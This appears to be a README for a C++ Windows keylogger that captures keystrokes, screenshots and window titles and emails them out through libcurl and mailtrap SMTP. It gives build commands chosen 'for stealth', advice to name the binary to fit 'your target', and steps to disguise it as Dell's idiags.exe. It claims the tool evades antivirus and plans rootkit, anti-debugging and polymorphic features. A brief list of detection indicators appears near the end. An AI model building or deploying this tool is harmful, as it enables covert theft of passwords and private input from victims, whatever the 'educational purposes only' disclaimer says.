This is a Windows-based keylogger implementation in C++ that captures keyboard input,screen captures,windows title capture and periodically sends reports via email. It uses Windows Hook API for keystroke capture and libcurl for email functionality.
| Feature | basic_implementation_email.cpp | window_screenshot_implementation.cpp |
|---|---|---|
| Keystroke Logging | ✅ Basic | ✅ Advanced with context |
| Email Reporting | ✅ Text only | ✅ Text + Screenshots |
| Screenshot Capture | ❌ | ✅ |
| Window Title Tracking | ❌ | ✅ |
| System Resource Usage | 🟢 Minimal | 🟡 Moderate |
| Build Complexity | 🟢 Simple | 🟡 Requires additional libraries |
| Stealth Level | 🟢 High | 🟡 Moderate (due to screenshots) |
This implementation has been tested against major antivirus solutions and remains undetected. Below are the scan results from multiple antivirus scanners:
-
Windows operating system (Windows 7 or later)
-
C++ compiler (MinGW-w64 or Visual Studio)
-
Installing MinGW-w64:
# Using winget (Windows Package Manager) winget install mingwAfter installation, add MinGW-w64 to PATH:
setx PATH "%PATH%;C:\mingw64\bin"Alternatively, manual installation:
- Download the installer from MinGW-w64 website
- During installation, select:
- Architecture: x86_64
- Threads: win32
- Exception: seh
- Add MinGW-w64 bin directory to system PATH
-
-
libcurl development libraries
- Using vcpkg:
# Clone vcpkg git clone https://github.com/Microsoft/vcpkg.git cd vcpkg # Bootstrap vcpkg .\bootstrap-vcpkg.bat # Add to PATH setx PATH "%PATH%;%CD%" ''' # Install libcurl: ```bash # Using vcpkg vcpkg install curl:x64-windows
- Using vcpkg:
-
Windows SDK (included with Visual Studio, or install separately):
# Using winget winget install Microsoft.WindowsSDK
-
Create a temporary mail before following 2. or 3. ,scroll down to section "Create Temporary Email Using temp-mail.org"
-
Compile basic_implementation_email.cpp using MinGW-w64:
# Using MinGW-w64 (recommended for stealth) g++ basic_implementation_email.cpp -o iDiags -lcurl -lwinmm -mwindowsNote: The name of the compiled executable is 'iDiags.exe' ,you need to change the name as per your target, safe bet would be to name it something like 'win64','win32','system','Network Service',etc
# Alternative without hiding console (for debugging) g++ basic_implementation_email.cpp -o keylogger -lcurl -lwinmmNote: The
-mwindowsflag prevents the console window from appearing when running the program, making it more stealthy. Remove this flag during development/debugging to see console output. -
Compile window_screenshot_implementation.cpp using MinGW-w64:
# Using MinGW-w64(recommended for stealth) g++ window_screenshot_implementation.cpp -o win64 -lgdiplus -lcurl -lwinmm -mwindowsNote: The name of the compiled executable is 'win64.exe' ,you need to change the name as per your target.
# For debugging (with console) g++ window_screenshot_implementation.cpp -o win_service_debug -lgdiplus -lcurl -lwinmm
- Visit mailtrap.io and click "Sign Up"
- Choose "Sign up with email" ,you can use temperary email from temp-mail.org
- Once logged in, go to "Email Testing" → "Inboxes"
- In your inbox, find the SMTP credentials:
- Click on "Show Credentials"
- Use the provided username and password in your configuration
- Use the SMTP server settings provided
The SMTP settings from mailtrap.io are secure and perfect for testing email functionality without exposing your personal email.if you are paranoid you can use proxy servers to recieve the data---coming soon :)
Before running, modify these constants in the source code:
#define EMAIL_ADDRESS "YOUR_USERNAME"
#define EMAIL_PASSWORD "YOUR_PASSWORD"
#define SEND_REPORT_EVERY 60 // secondsBefore running either implementation:
-
Email Configuration:
- Set up a mailtrap.io account as described in the Email Setup section
- Update the EMAIL_ADDRESS and EMAIL_PASSWORD in the source code
- Configure the SMTP settings according to your mailtrap.io credentials
-
Timing Configuration:
- Adjust SEND_REPORT_EVERY value (in seconds) based on your needs
- Default is set to 60 seconds
-
Output File Names:
- Screenshots are saved with timestamp-based names
- Consider changing the output directory path if needed
- Run the compiled executable:
note: the name of the compiled executable is 'iDiags.exe', it will differ depending on how you compiled the program
./iDiags
- The program will:
- Start capturing keystrokes
- Send email reports every 60 seconds
- Continue running until terminated
For educational purposes only, it's important to understand how malicious actors might exploit legitimate system processes. Here's an example:
Dell laptops come with Dell Support Assistant, which uses a legitimate process called idiags.exe. This process:
- Performs system diagnostics and stress tests
- Utilizes CPU and RAM resources
- Generates network traffic for system analysis
- Is trusted by users due to its official Dell origin
An attacker could exploit this trust by:
- Renaming
basic_implementation_email.cpptoidiags.cpp - Compiling it as
idiags.exe - Placing it in a Dell-related directory
This approach works because:
- The process name appears legitimate in Task Manager
- Resource usage matches expected behavior
- Network traffic seems normal for diagnostics
- Users are familiar with Dell's automated tools
The success of this strategy relies heavily on social engineering principles:
- Exploiting user trust in known brands
- Mimicking legitimate system processes
- Blending in with expected system behavior
-
Keyboard Hook System
- Uses
SetWindowsHookExwithWH_KEYBOARD_LLhook type - Captures all keyboard events system-wide
- Processes both standard keys and special keys (F1-F12, modifiers, etc.)
- Uses
-
Data Collection
- Stores captured keystrokes in memory
- Formats special keys for readability (e.g., "[ENTER]", "[BACKSPACE]")
- Uses Windows Virtual-Key codes for key identification
-
Email Reporting
- Implements SMTP using libcurl
- Sends periodic reports based on timer
- Uses mailtrap.io as SMTP server
- Clears local buffer after successful sending
hook_proc: Main keyboard event handlersend_email: Handles email composition and sendingTimerProc: Manages periodic report scheduling
-
Process Monitoring
- Visible in Task Manager
- Process name and resources visible
- Hook chain presence
-
File System
- Executable visible on disk
- File creation timestamp
- File location and permissions
-
Connection Patterns
- Regular SMTP connections (every 60s)
- Fixed destination (smtp.mailtrap.io:2525)
- Consistent data transfer patterns
-
Security Monitoring
- Firewall logs
- Network traffic analysis
- SMTP traffic from non-mail applications
-
API Monitoring
- SetWindowsHookEx calls
- Keyboard event monitoring
- Regular timer events
-
Resource Usage
- Memory footprint
- CPU usage patterns
- Network bandwidth usage
- Antivirus detection
- Behavioral analysis
- Heuristic detection
- Network security monitoring
-
Process Hiding
- Implement process name randomization
- Add anti-debugging techniques
- Develop rootkit capabilities
-
Network Stealth
- Implement traffic encryption
- Randomize connection intervals
- Use alternative communication channels
-
Data Collection
- Add screenshot capability
- Implement clipboard monitoring
- Add mouse movement tracking
- Include active window tracking
-
Reporting
- Add data compression
- Implement encryption
- Add alternative reporting methods
- Include system information
-
Error Handling
- Improve network error recovery
- Add local data persistence
- Implement backup servers
-
Performance
- Optimize memory usage
- Reduce CPU footprint
- Implement efficient storage
-
Anti-Detection
- Add signature randomization
- Implement polymorphic code
- Add anti-analysis features
-
Data Protection
- Implement end-to-end encryption
- Add secure data storage
- Improve credential handling
This project is for educational purposes only.Find the attached license for more details.